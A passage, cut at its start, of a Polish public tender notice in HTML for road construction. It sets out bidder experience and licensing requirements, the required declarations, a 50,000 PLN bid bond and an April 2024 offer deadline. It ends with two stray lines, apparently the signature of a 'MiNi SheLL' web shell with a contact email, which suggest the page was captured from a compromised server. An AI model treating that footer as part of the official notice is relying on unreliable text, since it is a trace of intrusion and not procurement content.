postępowaniu.</h3> Zdolność techniczna lub zawodowa<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. <br/>1. Zamawiający wymaga, aby Wykonawca dysponował doświadczeniem, tj. wykonał przynajmniej jedną robotę budowlaną, polegającą na: budowie, przebudowie, rozbudowie lub remoncie drogi o nawierzchni bitumicznej, o długości przynajmniej 0,5 km i wartości przynajmniej 1 000 000,00 złotych, (jeden milion złotych, 00/100)<br/>2. Zamawiający wymaga, aby Wykonawca przynajmniej jedną osobą posiadającą stosowne do zakresu zamówienia uprawnienia budowlane, tj. posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności:<br/>- w specjalności drogowej, (kierownik budowy),<br/>- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych <br/>i kanalizacyjnych, (kierownik robót),<br/>- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, (kierownik robót),<br/>- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych , (kierownik robót),<br/> - w specjalności konstrukcyjno – budowlanej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy w sprawie grupy kapitałowej<br/>Oświadczenie Wykonawcy, zgodne z załącznikiem nr 5 do SWZ, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2023r. poz. 1689), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/><br/>Odpis lub informacja z KRS lub CEIDG<br/>Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/><br/>Dokument potwierdzający, że nie otwarto likwidacji wykonawcy<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast &#34;Odpisu lub informacji z KRS lub CEIDG&#34; składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowanych<br/>Wykaz robót budowlanych, zgodny z załącznikiem nr 3 do SWZ, wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami, wykaz robót budowlanych dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>Zamawiający wymaga, aby Wykonawca dysponował doświadczeniem, tj. wykonał przynajmniej jedną robotę budowlaną, polegającą na: budowie, przebudowie, rozbudowie lub remoncie drogi o nawierzchni bitumicznej, o długości przynajmniej 0,5 km i wartości przynajmniej <br/>1 000 000,00 złotych, (jeden milion złotych, 00/100).<br/><br/>Wykaz osób<br/>Wykaz osób, zgodny z załącznikiem nr 4 do SWZ, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Zamawiający wymaga, aby Wykonawca przynajmniej jedną osobą posiadającą stosowne do zakresu zamówienia uprawnienia budowlane, tj. posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności:<br/>- w specjalności drogowej, (kierownik budowy),<br/>- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych <br/>i kanalizacyjnych, (kierownik robót),<br/>- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, (kierownik robót),<br/>- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych , (kierownik robót),<br/> - w specjalności konstrukcyjno – budowlanej.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wzór oferty na roboty budowlane<br/>2. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeśli dotyczy)<br/>3. Zobowiązanie podmiotu udostępniającego zasoby (jeśli dotyczy)<br/>4. Kosztorys ofertowy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 50 000.00 PLN (słownie: pięćdziesiąt tysięcy 00/100<br/>PLN).<br/>Szczegóły opisano w rozdziale 16 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Opisano w rozdziale 13 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne zmiany umowy określa załącznik nr 6 do SWZ, tj. &#34;Projekt umowy na roboty budowlane&#34;.<br/>Dopuszcza się również nie wymienione w projekcie umowy zmiany redakcyjne, stylistyczne, nie zmieniające w sposób istotny postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami, należy złożyć za pośrednictwem https://e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-10</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com